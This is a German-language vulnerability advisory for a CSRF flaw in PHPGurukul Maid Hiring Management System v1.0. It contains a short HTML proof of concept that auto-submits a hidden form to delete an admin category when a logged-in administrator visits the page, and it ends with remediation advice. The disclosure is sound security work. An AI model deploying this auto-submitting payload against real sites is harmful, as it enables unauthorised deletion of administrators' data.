
Proof-of-Concept für eine CSRF-Schwachstelle in PHPGurukul Maid Hiring Management System v1.0, das unbefugte Löschen von Kategorien durch manipulierte bösartige Links demonstriert.
Projektname & Repo-URL: Maid Hiring Management System mit PHP und MySQL
Schwachstellentyp: Clientseitige Request-Fälschung
Betroffene Version(en): v1.0
💣Schwachstellenbeschreibung: Eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle existiert im Admin-Panel des PHPGurukul Hiring Management Systems, die es einem Angreifer ermöglicht, beliebige Einstellungskategorien zu löschen, indem er einen authentifizierten Administrator dazu bringt, eine bösartige Seite zu besuchen. Dies kann zu Datenlöschung und unbefugten Änderungen auf Admin-Ebene führen.
👩💻Auswirkungen: Unberechtigte Löschung von Kategorien.
🛜Proof-of-Concept (PoC):

/admin/manage-category.php zu senden
CSRF-POC<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Empfehlung: Implementierung von CSRF-Tokens in Admin-Formularen, Durchsetzung von SameSite-Cookies und Validierung des Anfragenursprungs, um unbefugte Aktionen zu verhindern.